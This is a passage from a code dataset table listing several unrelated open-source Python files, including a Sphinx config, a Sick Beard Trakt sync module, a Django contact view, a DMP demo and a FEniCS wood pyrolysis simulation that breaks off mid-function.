code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
from lib.models.basemodels import *
|
hzlf/openbroadcast
|
website/lib/models/__init__.py
|
Python
|
gpl-3.0
| 35
|
# -*- coding: utf-8 -*-
#
# segraph documentation build configuration file, created by
# sphinx-quickstart on Wed May 31 11:53:59 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'segraph'
copyright = u'2017, Abhinandan Dubey'
author = u'Abhinandan Dubey'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.5'
# The full version, including alpha/beta/rc tags.
release = u'0.5'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'segraphdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'segraph.tex', u'segraph Documentation',
u'Abhinandan Dubey', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'segraph', u'segraph Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'segraph', u'segraph Documentation',
author, 'segraph', 'One line description of project.',
'Miscellaneous'),
]
|
alivcor/segraph
|
docs/conf.py
|
Python
|
gpl-3.0
| 4,734
|
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 12 09:25:49 2013
@author: ozdemircili
"""
"""
Installation:
pip install clint
"""
from clint.textui import colored, indent, puts
print 'Colored output ' + colored.yellow('pyt') + colored.blue('hon')
'''Indent Example'''
with indent(3, quote=colored.red(' >')):
puts ('indent01')
puts ('indent02')
with indent(3, quote=colored.green(' |')):
puts('that`s some juicy indent')
puts('isn\'t?')
|
ozdemircili/pycheat
|
pycheat/clint.py
|
Python
|
gpl-3.0
| 487
|
from zope.interface import Interface, Attribute
class IPengine(Interface):
"""Interface to a pengine thread on a server"""
id=Attribute("Identifier (session) of pengine interaction.")
options=Attribute("Dictionary of stanadard options used in communications")
connection=Attribute("Connection data in form of (server_name, port)")
alias=Attribute("Alias of the pengine or None.")
def create(src):
"""Create a pengine with sending there a
prolog-program as src"""
def ask(src):
"""Perform query (ask) for
the first solution if any."""
def query(src):
"""Alias for ask."""
def next(count):
"""Query next count solution."""
def stop(count):
"""Stop searching for solution."""
def abort():
"""Abort execution."""
def detroy():
"""Abort execution."""
def prompt(term):
"""Runned if a pengine wants some data"""
def output(term):
"""Runned if a pengine wanst
to send some output"""
def falure():
"""Runned if no solution found."""
def error(term):
"""Runned if an error occurs."""
def success(term, more):
"""Runned when pengine got some success
on obtaining a query result."""
def define_app(app):
"""Define an application"""
def get_app(app):
"""Check if the application exists"""
def get_property(name):
"""Get property of the pengine by name."""
def set_property(name, value):
"""Set property name of the pengine to
value val."""
def properties():
"""Enumerate properties as (name,value)
of the pengine."""
#Other useful methods will folow.
|
eugeneai/pengines
|
pengines/interfaces.py
|
Python
|
gpl-3.0
| 1,735
|
# Author: Dieter Blomme <dieterblomme@gmail.com>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard. If not, see <http://www.gnu.org/licenses/>.
import time
from lib.dateutil import parser
import sickbeard
from sickbeard import logger
from sickbeard import db
from sickbeard import trakt
from sickbeard import search_queue
from common import WANTED, WAITING
class TraktSync:
"""
A synchronizer for trakt.tv which keeps track of which episode has and hasn't been watched.
"""
def __init__(self):
self.amActive = False
def _use_me(self):
return sickbeard.USE_TRAKT and sickbeard.USE_TRAKT_SYNC
def updateWatchedData(self):
self.amActive = True
method = "users/me/history/episodes"
response = trakt.sendData(method);
if response != False:
changes = dict();
myDB = db.DBConnection()
for data in response:
show_name = data["show"]["title"]
show_id = data["show"]["ids"]["tvdb"]
season = data["episode"]["season"]
episode = data["episode"]["number"]
watched = time.mktime(parser.parse(data["watched_at"]).timetuple())
cursor = myDB.action("UPDATE tv_episodes SET last_watched=? WHERE showid=? AND season=? AND episode=? AND (last_watched IS NULL OR last_watched < ?)", [watched, show_id, season, episode, watched])
if cursor.rowcount > 0:
changes[show_name] = changes.get(show_name, 0) + 1
logger.log("Updated " + show_name + ", episode " + str(season) + "x" + str(episode) + " watched @ " + str(watched))
message = "Watched episodes synchronization complete: ";
if (len(changes) == 0):
message += "No changes detected."
else:
message += "Marked as watched "
first = True;
for show_name in changes:
if (first):
message += ", "
first = False;
message += str(changes[show_name]) + " episodes of " + show_name + ""
logger.log(message)
else:
logger.log("Watched episodes synchronization failed.")
self.updateNextEpisodeData();
def updateNextEpisodeData(self):
myDB = db.DBConnection()
myDB.action("DELETE FROM trakt_data;")
update_datetime = int(time.time())
showList = list(sickbeard.showList)
for show in showList:
sqlResults = myDB.select("SELECT season, episode FROM v_episodes_to_watch where showid = ? order by season asc, episode asc limit 1", [show.tvdbid]);
if len(sqlResults) == 1:
nextSeason = sqlResults[0]["season"];
nextEpisode = sqlResults[0]["episode"];
else:
nextSeason = -1;
nextEpisode = -1;
myDB.action("INSERT INTO trakt_data(showid, next_season, next_episode, last_updated) VALUES(?, ?, ?, ?)", [show.tvdbid, nextSeason, nextEpisode, update_datetime]);
logger.log("Next episodes synchronization complete.")
self.updateEpisodesToAutoDownload()
def updateEpisodesToAutoDownload(self):
myDB = db.DBConnection()
showList = list(sickbeard.showList)
for show in showList:
if show.stay_ahead > 0:
sqlResults = myDB.select("SELECT season, episode, name FROM tv_episodes WHERE status = ? and episode_id IN (select ep.episode_id from tv_episodes ep left join trakt_data trakt on trakt.showid = ep.showid where ep.showid = ? AND ep.season > 0 AND ((trakt.next_season IS NULL) OR (trakt.next_season > -1 AND ((ep.season > trakt.next_season) OR (ep.season = trakt.next_season AND ep.episode >= trakt.next_episode)))) order by ep.season ASC, ep.episode ASC limit ?)", [WAITING, show.tvdbid, show.stay_ahead]);
if len(sqlResults) > 0:
myDB.action("UPDATE tv_episodes set status = ? where status = ? and episode_id IN (select ep.episode_id from tv_episodes ep left join trakt_data trakt on trakt.showid = ep.showid where ep.showid = ? AND ep.season > 0 AND ((trakt.next_season IS NULL) OR (trakt.next_season > -1 AND ((ep.season > trakt.next_season) OR (ep.season = trakt.next_season AND ep.episode >= trakt.next_episode)))) order by ep.season ASC, ep.episode ASC limit ?)", [WANTED, WAITING, show.tvdbid, show.stay_ahead])
for row in sqlResults:
ep = show.getEpisode(int(row["season"]), int(row["episode"]))
logger.log(show.name + ": Episode " + ep.prettyName() + " queued for download due to StayAhead policies.")
queue_item = search_queue.ManualSearchQueueItem(ep)
sickbeard.searchQueueScheduler.action.add_item(queue_item) #@UndefinedVariable
logger.log("Synchronization complete.")
self.amActive = False
def run(self):
self.updateWatchedData()
|
Zelgadis87/Sick-Beard
|
sickbeard/traktSync.py
|
Python
|
gpl-3.0
| 5,813
|
'''
Created on 2014-02-13
A module that introduces a special class intended for station datasets (i.e. time-series only).
@author: Andre R. Erler, GPL v3
'''
# internal imports
from geodata.base import Dataset, Variable, Axis
from geodata.netcdf import DatasetNetCDF
## the basic station class, without any geographic information
class StationDataset(Dataset):
'''
A Dataset class that is intended for station time-series data (usually one-dimensional), at one
particular location; this class also holds additional meta data.
'''
def __init__(self, name=None, title=None, ID=None, varlist=None, atts=None, **kwargs):
'''
This class can be initialized simply with a name and a (optionally) a set of variables.
Station Attributes:
ID = @property # station ID
Basic Attributes:
name = @property # short name (links to name in atts)
title = @property # descriptive name (links to name in atts)
variables = dict() # dictionary holding Variable instances
axes = dict() # dictionary holding Axis instances (inferred from Variables)
atts = AttrDict() # dictionary containing global attributes / meta data
'''
# initialize Dataset using parent constructor (kwargs are necessary, in order to support multiple inheritance)
super(StationDataset,self).__init__(name=name, title=title, varlist=varlist, atts=atts, **kwargs)
# set remaining attibutes
if ID is not None or 'ID' not in self.atts: self.atts['ID'] = ID
@property
def ID(self):
''' The station ID, usually an alphanumerical code. '''
return self.atts['ID']
@ID.setter
def ID(self, ID):
self.atts['ID'] = ID
## the NetCDF version of the station dataset
class StationNetCDF(StationDataset,DatasetNetCDF):
'''
A StationDataset, associated with a NetCDF file, inheriting the properties of DatasetNetCDF.
WARNING: this class has not been tested!
'''
def __init__(self, name=None, title=None, ID=None, dataset=None, filelist=None, varlist=None, varatts=None,
atts=None, axes=None, multifile=False, check_override=None, folder='', mode='r', ncformat='NETCDF4',
squeeze=True):
'''
Create a Dataset from one or more NetCDF files; Variables are created from NetCDF variables.
Station Attributes:
ID = @property # station ID
NetCDF Attributes:
mode = 'r' # a string indicating whether read ('r') or write ('w') actions are intended/permitted
datasets = [] # list of NetCDF datasets
dataset = @property # shortcut to first element of self.datasets
filelist = [] # files used to create datasets
Basic Attributes:
variables = dict() # dictionary holding Variable instances
axes = dict() # dictionary holding Axis instances (inferred from Variables)
atts = AttrDict() # dictionary containing global attributes / meta data
'''
# call parent constructor
super(StationNetCDF,self).__init__(self,self, name=None, title=None, ID=None, dataset=None, filelist=None,
varlist=None, varatts=None, atts=None, axes=None, multifile=False,
check_override=None, folder='', mode='r', ncformat='NETCDF4', squeeze=True)
|
aerler/GeoPy
|
src/geodata/station.py
|
Python
|
gpl-3.0
| 3,438
|
"""
Copyright (C) 2016 Travis DeWolf
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import numpy as np
import matplotlib.pyplot as plt
import pydmps
import pydmps.dmp_discrete
y_des = np.load("2.npz")["arr_0"].T
y_des -= y_des[:, 0][:, None]
# test normal run
dmp = pydmps.dmp_discrete.DMPs_discrete(n_dmps=2, n_bfs=500, ay=np.ones(2) * 10.0)
y_track = []
dy_track = []
ddy_track = []
dmp.imitate_path(y_des=y_des)
y_track_normal, _, _ = dmp.rollout(tau=1)
y_track_slow, _, _ = dmp.rollout(tau=0.1)
y_track_fast, _, _ = dmp.rollout(tau=4)
plt.figure(1, figsize=(6, 6))
plt.plot(y_track_normal[:, 0], y_track_normal[:, 1], "b", lw=2)
plt.plot(y_track_slow[:, 0], y_track_slow[:, 1], "--r", lw=2)
plt.plot(y_track_fast[:, 0], y_track_fast[:, 1], "--y", lw=2)
plt.legend(['Normal', 'Slow', 'Fast'])
plt.title("DMP system - draw number 2")
plt.axis("equal")
plt.xlim([-2, 2])
plt.ylim([-2, 2])
plt.figure(2)
plt.subplot(3, 1, 1)
plt.title("DMP system - draw number 2")
plt.plot(y_track_normal)
plt.ylabel('Normal')
plt.subplot(3, 1, 2)
plt.plot(y_track_slow)
plt.ylabel('Slow')
plt.subplot(3, 1, 3)
plt.plot(y_track_fast)
plt.ylabel('Fast')
plt.show()
|
studywolf/pydmps
|
examples/draw_number_2_temporal_scaling.py
|
Python
|
gpl-3.0
| 1,727
|
#!/usr/bin/env python3
# Count Active Transactions
import pymysql
def mainactions(args_list, configs, db_cur) :
# Count Active Transactions
help_string='''
Usage:
* Default: Returns the number of currently opened & tracked transaction
Specify the Warning and Critical Thresholds as the next two
variables (or I'll use the default 50 100'''
unknown_error=False
warn = 50
crit = 100
#print(args_list)
if len(args_list) == 2 :
# I've been provided Custom Warn's & Crits
warn = int(args_list[0])
crit = int(args_list[1])
#print(warn, crit)
total_transactions_query = "select count(*) as count from trked_trans where active = true ;"
try:
db_cur.execute(total_transactions_query)
except Exception as e :
unknown_error=True
response_string = "UNKNOWN: MySQL Query Error " + str(e)
response_code = 3
active_transactions = 0
else:
query_results = db_cur.fetchone()
active_transactions = query_results["count"]
if active_transactions > crit :
response_string = "CRITICAL: Large Number of Transactions " + str(active_transactions)
response_code = 2
elif active_transactions > warn :
response_string = "WARNING: Large Number of Transactions " + str(active_transactions)
response_code = 1
else :
# Number is okay
response_string = "OK: Acceptable Number of Transactions " + str(active_transactions)
response_code = 0
perf_strings = list()
perf_strings.append(" active_transactions="+str(active_transactions))
perf_string = " | " + " , ".join(perf_strings)
response_message = response_string + perf_string
nag_object = ( response_message, response_code )
return nag_object
|
chalbersma/persist_transaction
|
perf/count_active_transactions.py
|
Python
|
gpl-3.0
| 1,679
|
from django.core.mail import send_mail
from django.shortcuts import redirect, render
# Create your views here.
from contact.forms import ContactForm
def contact(request):
form_class = ContactForm
# new logic!
if request.method == 'POST':
form = form_class(request.POST, request.FILES)
if form.is_valid():
contact_name = request.POST.get(
'Name'
, '')
contact_email = request.POST.get(
'Email'
, '')
form_content = request.POST.get('Message', '')
form.save()
send_mail('Smallplex - new contact: %s' % contact_name, form_content, contact_email,
['nosonwan@gmail.com'])
return redirect('success')
return render(request, 'contact.html', {
'form': form_class,
})
def success(request):
return render(request, 'contact_form_sent.html')
|
osonwanne/smallplexsites
|
contact/views.py
|
Python
|
gpl-3.0
| 932
|
from fenics import *
from time import time
from helper import *
import numpy as np
import matplotlib as mpl
mpl.rcParams['font.family'] = 'serif'
mpl.rcParams['legend.fontsize'] = 'medium'
mpl.rcParams['text.usetex'] = True
mpl.rcParams['text.latex.preamble'] = ['\usepackage[mathscr]{euscript}']
#mpl.rcParams['contour.negative_linestyle'] = 'solid'
parameters['form_compiler']['quadrature_degree'] = 2
parameters['plotting_backend'] = 'matplotlib'
# constants :
R = 8.3144 # universal gas constant
sigma = 5.67e-8 # Boltzman's constant
g_a = 9.80665 # gravitational acceleration
# pre-exponential factor for wood (W), tar (r) and char + gas (av) :
A_W = 2.8e19
A_C = 1.3e10
A_r = 3.28e14
# activation energy for wood (W), tar (r) and char + gas (av) :
E_W = 242.4e3
E_C = 150.5e3
E_r = 196.5e3
# split reaction ratio between gas and char :
nu_g = 0.65
nu_C = 0.35
# enthalpy variation :
delta_h_W = 0.0
delta_h_C = -418.0e3
delta_h_r = -418.0e3
# heat capacity :
c_W = 2.3e3
c_A = 2.3e3
c_g = 1.8e3
c_C = 1.1e3
c_r = 1.1e3 # FIXME: missing for tar
mu = 3e-5 # gas viscosity
omega = 1.0 # emissiviy
omega_s = 0.8 # surface emissivity of timber
h_c = 20 # convective heat transfer coefficent
# pore diameter :
d = as_vector([4e-5, 4e-5 ])
# permeability :
B_W = as_vector([1e-14, 1e-11])
B_C = as_vector([5e-12, 5e-11])
# thermal conductivity :
k_W = as_vector([10.5e-2, 25.5e-2])
k_C = as_vector([7.1e-2, 10.46e-2])
k_g = as_vector([25.77e-3, 25.77e-3])
# gravitational acceleration vector :
g = as_vector([0.0, -g_a])
# time parameters :
dt = 0.2 # time step
t0 = 0.0 # start time
t = t0 # current time
t1 = dt # equilibrium time
tf = 31.0 # final time
# file output :
out_dir = './output/'
plt_dir = './images/'
#===============================================================================
# function space declarations :
# mesh varaiables :
tau = 1.0e-2 # width of domain
dn = 24 # number of elements
# create a mesh :
p1 = Point(0.0, 0.0) # origin
p2 = Point(tau, tau) # x, y corner
mesh = RectangleMesh(p1, p2, dn, dn, "crossed") # a box to fill the void
# define finite elements spaces and build mixed space :
BDMe = FiniteElement("BDM", mesh.ufl_cell(), 1)
DGe = FiniteElement("DG", mesh.ufl_cell(), 0)
DG2e = FiniteElement("DG", mesh.ufl_cell(), 2)
CGe = FiniteElement("CG", mesh.ufl_cell(), 1)
We = MixedElement([BDMe, DGe, DGe, DGe, DGe, CGe])
BDM = FunctionSpace(mesh, BDMe)
DG = FunctionSpace(mesh, DGe)
CG = FunctionSpace(mesh, CGe)
VCG = VectorFunctionSpace(mesh, 'CG', 1)
W = FunctionSpace(mesh, We)
# mesh variables :
n = FacetNormal(mesh)
h = CellSize(mesh)
V = CellVolume(mesh)
# define trial and test functions :
Phi = TestFunction(W)
dU = TrialFunction(W)
U = Function(W)
U1 = Function(W)
# get the individual functions :
phi_x, phi_y, psi, xi, chi, zeta, beta = Phi
u, v, p, rho_W, rho_A, rho_C, T = U
u1, v1, p1, rho_W1, rho_A1, rho_C1, T1 = U1
phi = as_vector([phi_x, phi_y ])
U3 = as_vector([u, v ])
U31 = as_vector([u1, v1 ])
#===============================================================================
# empirical relations and balance laws :
# volume of solid :
def V_S(rho_W, rho_C, rho_A):
return (rho_W + rho_C + rho_A) * V_S_0 / rho_W_0
# reaction-rate factor :
def K(T, A, E):
return A * exp( - E / (R * T) )
# virgin wood reaction rate factor :
def K_W(T):
return K(T, A_W, E_W)
# char and gas reaction rate factor :
def K_Cg(T):
return K(T, A_C, E_C)
# tar reaction rate factor :
def K_r(T):
return K(T, A_r, E_r)
# virgin wood reaction rate :
def r_W(rho_W, T):
return K_W(T) * rho_W
# char and gas reaction rate :
def r_Cg(rho_A, T):
return K_Cg(T) * rho_A
# tar reaction rate :
def r_r(rho_A, T):
return K_r(T) * rho_A
# porosity :
def epsilon(rho_W, rho_C, rho_A, V):
return (V - V_S(rho_W, rho_C, rho_A)) / V
# ratio of current solid mass to initial solid mass :
def eta(rho_W, rho_A):
return (rho_A + rho_W) / rho_W_0
# thermal conductivity tensor :
def k(rho_W, rho_C, rho_A, T, V):
k_v = + eta(rho_W, rho_A) * k_W \
+ (1 - eta(rho_W, rho_A)) * k_C \
+ epsilon(rho_W, rho_C, rho_A, V) * k_g \
+ sigma * T**3 * d / omega
k_xx = k_v[0]
k_yy = k_v[1]
k_v = as_matrix([[k_xx, 0.0 ],
[0.0, k_yy]])
return k_v
# gas density :
def rho_g(p, T):
return p * W_g / (R * T)
# inverse permeability tensor :
def B_inv(rho_W, rho_A):
B_v = + eta(rho_W, rho_A) * B_W \
+ (1 - eta(rho_W, rho_A)) * B_C
B_inv_xx = -mu / (rho_g(p,T) * B_v[0] + DOLFIN_EPS)
B_inv_yy = -mu / (rho_g(p,T) * B_v[1] + DOLFIN_EPS)
B_v = as_matrix([[B_inv_xx, 0.0 ],
[0.0, B_inv_yy]])
return B_v
# enthalpy variation due to chemical reactions :
def q_r(rho_W, rho_A, T):
q_r_v = + K_W(T)*rho_W*(delta_h_W + (T - T_0)*(c_W - c_A)) \
+ K_Cg(T)*rho_A*(delta_h_C + (T - T_0)*(c_A - nu_C*c_C - nu_g*c_g)) \
+ K_r(T)*rho_A*(delta_h_r + (T - T_0)*(c_A - c_r))
return q_r_v
# temperature flux boundary condition :
def kdTdn(T):
return - omega_s * sigma * (T**4 - T_inf**4) - h_c * (T - T_inf)
# time derivative :
def dudt(u,u1): return (u - u1) / dt
# intrinsic time parameter :
def tau(u, v, k):
order = 1
# the Peclet number :
Unorm = sqrt(dot(v, v) + DOLFIN_EPS)
knorm = sqrt(dot(k, k) + DOLFIN_EPS)
PE = Unorm * h / (2*knorm)
# for linear elements :
if order == 1:
xi = 1/tanh(PE) - 1/PE
# for quadradic elements :
if order == 2:
xi_1 = 0.5*(1/tanh(PE) - 2/PE)
xi = ((3 + 3*PE*xi_1)*tanh(PE) - (3*PE + PE**2*xi_1)) \
/ ((2 - 3*xi_1*tanh(PE))*PE**2)
# intrinsic time parameter :
tau_n = h*xi / (2 * Unorm)
return tau_n
#===============================================================================
# initial conditions :
T_0 = 300.0
rho_W_0 = 400.0
rho_A_0 = 0.0
rho_C_0 = 0.0
V_S_0 = 0.4 * V
p_0 = 8e3
W_g = 2.897e-2 # FIXME: need molecular weight of gas
rho_g_0 = p_0 * W_g / (R * T_0)
U3i = interpolate(Constant((0.0,0.0)), BDM)
pi = interpolate(Constant(p_0), DG)
rho_Wi = interpolate(Constant(rho_W_0), DG)
rho_Ai = interpolate(Constant(rho_A_0), DG)
rho_Ci = interpolate(Constant(rho_C_0), DG)
Ti = interpolate(Constant(T_0), CG)
# assign initial values :
assign(U, [U3i, pi, rho_Wi, rho_Ai, rho_Ci, Ti])
#===============================================================================
# boundary conditions for temperature and gas density by proxy of pressure :
ff = FacetFunction('size_t', mesh, 0)
tol = 1e-6
# left = 1 ----2----
# top = 2 | 3
# right = 3 1 |
# bottom = 4 ----4----
for f in facets(mesh):
n_f = f.normal()
if n_f.x() > tol and abs(n_f.y()) < tol and f.exterior():
ff[f] = 1
elif abs(n_f.x()) < tol and n_f.y() > tol and f.exterior():
ff[f] = 2
elif n_f.x() < tol and abs(n_f.y()) < tol and f.exterior():
ff[f] = 3
elif abs(n_f.x()) < tol and n_f.y() < tol and f.exterior():
ff[f] = 4
# the new measure :
ds = Measure('ds', subdomain_data=ff)
# the ambient boundary :
dAmb = ds(1) + ds(2) + ds(3)
# boundary conditions :
T_inf = Constant(900.0) # ambient temperatur
p_inf = Constant(p_0) # ambient gas pressure
# cellulosic fire curve (ISO-834) applied ambient temperature :
class AmbientTemperature(Expression):
def __init__(self, t, element=None):
self.t = t
def eval(self, value, x):
if self.t < t1:
value[0] = T_0
else:
value[0] = T_0 + 345*np.log10(8*self.t/60.0 + 1)
def entire_boundary(x, on_boundary):
return on_boundary
# ambient temperature for natural Neumann boundary condition :
#T_inf = AmbientTemperature(t0, element=CGe)
# define a list of boundary condition objects for solver :
#bc_T_left = DirichletBC(W.sub(5), T_inf, ff, 1)
#bc_T_top = DirichletBC(W.sub(5), T_inf, ff, 2)
#bc_T_right = DirichletBC(W.sub(5), T_inf, ff, 3)
#bc_T_bottom = DirichletBC(W.sub(5), T_inf, ff, 4)
#bc_T = DirichletBC(W.sub(5), T_inf, entire_boundary)
#bcs = [bc_T_left, bc_T_top, bc_T_right, bc_T_bottom]
bcs = []
#===============================================================================
# the variational formulation :
# midpoint values (Crank-Nicolson) :
ep1 = epsilon(rho_W1, rho_C1, rho_A1, V)
ep = epsilon(rho_W, rho_C, rho_A, V)
p_mid = 0.5 * (p + p1)
rho_g_mid = 0.5 * (ep*rho_g(p,T) + ep1*rho_g(p1,T1))
rho_W_mid = 0.5 * (rho_W + rho_W1)
rho_A_mid = 0.5 * (rho_A + rho_A1)
rho_C_mid = 0.5 * (rho_C + rho_C1)
T_mid = 0.5 * (T + T1)
# gas velocity residual :
delta_U3 = + dot(U3, B_inv(rho_W_mid, rho_A_mid)*phi) * dx \
+ p_mid * div(phi) * dx \
- p_inf * dot(phi, n) * ds \
- dot(rho_g_mid*g, phi) * dx
# gas mass balance residual :
delta_rho_g = + dudt(ep*rho_g(p, T), ep1*rho_g(p1, T1)) * psi * dx \
+ div(U3) * psi * dx \
- (+ nu_g*r_Cg(rho_A_mid, T_mid) \
+ r_r(rho_A_mid, T_mid))*psi*dx
# virgin solid wood mass balance :
delta_rho_W = + dudt(rho_W, rho_W1) * xi * dx \
+ r_W(rho_W_mid, T) * xi * dx
# active intermediate solid wood (tar) mass balance :
delta_rho_A = + dudt(rho_A, rho_A1) * chi * dx \
+ ( + r_Cg(rho_A_mid, T_mid) \
+ r_r(rho_A_mid, T_mid) \
- r_W(rho_W_mid, T_mid) ) * chi * dx
# solid char mass balance :
delta_rho_C = + dudt(rho_C, rho_C1) * zeta * dx \
- nu_C * r_Cg(rho_A_mid, T_mid) * zeta * dx
# advective temerature flux :
def L_T_adv(u):
return c_g * dot(U3, grad(u))
# advective and diffusive temperature differential operator :
def L_T(u):
Lu = + L_T_adv(u) \
- ( k(rho_W_mid, rho_C_mid, rho_A_mid, u, V)[0] * u.dx(0) ).dx(0) \
- ( k(rho_W_mid, rho_C_mid, rho_A_mid, u, V)[1] * u.dx(1) ).dx(1)
return Lu
# enthalpy balance :
#tau_T = tau(T_mid, U3, k(rho_W_mid, rho_C_mid, rho_A_mid, T_mid, V))
T_factor = + rho_C_mid*c_C + rho_W_mid*c_W \
+ rho_A_mid*c_A + rho_g_mid*c_g
k_t = k(rho_W_mid, rho_C_mid, rho_A_mid, T_mid, V)
delta_T = + T_factor * dudt(T, T1) * beta * dx \
+ L_T_adv(T_mid) * beta * dx \
+ inner( k_t * grad(T_mid), grad(beta)) * dx \
- q_r(rho_W_mid, rho_A_mid, T_mid) * beta * dx \
- kdTdn(T_mid) * beta * ds \
# + inner(L_T_adv(beta), tau_T*L_T(T_mid)) * dx \
#===============================================================================
# solution procedure :
# total residual :
delta = delta_U3 + delta_rho_g + delta_rho_W \
+ delta_rho_A + delta_rho_C + delta_T
# Jacobian :
J = derivative(delta, U, dU)
params = {'newton_solver' :
{
'linear_solver' : 'mumps',
#'linear_solver' : 'tfqmr',
#'preconditioner' : 'jacobi',
'absolute_tolerance' : 1e-14,
'relative_tolerance' : 1e-9,
'relaxation_parameter' : 1.0,
'maximum_iterations' : 20,
'error_on_nonconvergence' : True
}
}
ffc_options = {"optimize" : True}
#ffc_options = {}
problem = NonlinearVariationalProblem(delta, U, J=J, bcs=bcs,
form_compiler_parameters=ffc_options)
solver = NonlinearVariationalSolver(problem)
solver.parameters.update(params)
def plot_solution(U,t):
"""
function saves a nice plot of the function ``U`` at time ``t``.
"""
U3n, pn, rho_Wn, rho_An, rho_Cn, Tn = U.split(True)
U3n = project(U3n, VCG)
rho_gn = project(rho_g(pn, Tn), DG)
# efficiently calculate overpressure p / p_0 :
p_rat_v = pn.vector().array() / p_0
p_rat = Function(DG, name="p_rat")
p_rat.vector().set_local(p_rat_v)
#U3n.rename('U3', '')
#pn.rename('p', '')
#rho_gn.rename('rho_g', '')
#rho_Wn.rename('rho_W', '')
#rho_An.rename('rho_A', '')
#rho_Cn.rename('rho_C', '')
#Tn.rename('T', '')
#
#File(out_dir + 'U3.pvd') << U3n
#File(out_dir + 'p.pvd') << pn
#File(out_dir + 'rho_g.pvd') << rho_gn
#File(out_dir + 'rho_W.pvd') << rho_Wn
#File(out_dir + 'rho_A.pvd') << rho_An
#File(out_dir + 'rho_C.pvd') << rho_Cn
#File(out_dir + 'T.pvd') << Tn
dp = 0.025
plot_variable(u = U3n, name = 'U_%g' % t, direc = plt_dir,
ext = '.pdf',
title = r'$\Vert \mathbf{u} \Vert_{t=%g}$' % t,
levels = None,
numLvls = 6,
cmap = 'viridis',
tp = False,
show = False,
vec_scale = None,
vec_alpha = 0.8,
normalize_vec = False,
extend = 'neither',
cb_format = '%.1e')
plot_variable(u = p_rat, name = 'p_rat_%g' % t, direc = plt_dir,
ext = '.pdf',
title = r'$\frac{p}{p_0}\Big|_{t=%g}$' % t,
levels = None,
numLvls = 9,
umin = 1,
umax = 1 + dp*8,
scale = 'lin',
cmap = 'viridis',
tp = True,
show = False,
extend = 'max',
cb_format = '%.3f')
plot_variable(u = rho_Wn, name = 'rho_W%g' % t, direc = plt_dir,
ext = '.pdf',
title = r'$\rho_{\mathrm{W}}\Big|_{t=%g}$' % t,
levels = None,
numLvls = 9,
scale = 'lin',
cmap = 'viridis',
tp = True,
show = False,
extend = 'neither',
cb_format = '%.1f')
plot_variable(u = rho_An, name = 'rho_A%g' % t, direc = plt_dir,
ext = '.pdf',
title = r'$\rho_{\mathrm{A}}\Big|_{t=%g}$' % t,
levels = None,
numLvls = 9,
scale = 'lin',
cmap = 'viridis',
tp = True,
show = False,
extend = 'neither',
cb_format = '%.1f')
plot_variable(u = rho_Cn, name = 'rho_C%g' % t, direc = plt_dir,
ext = '.pdf',
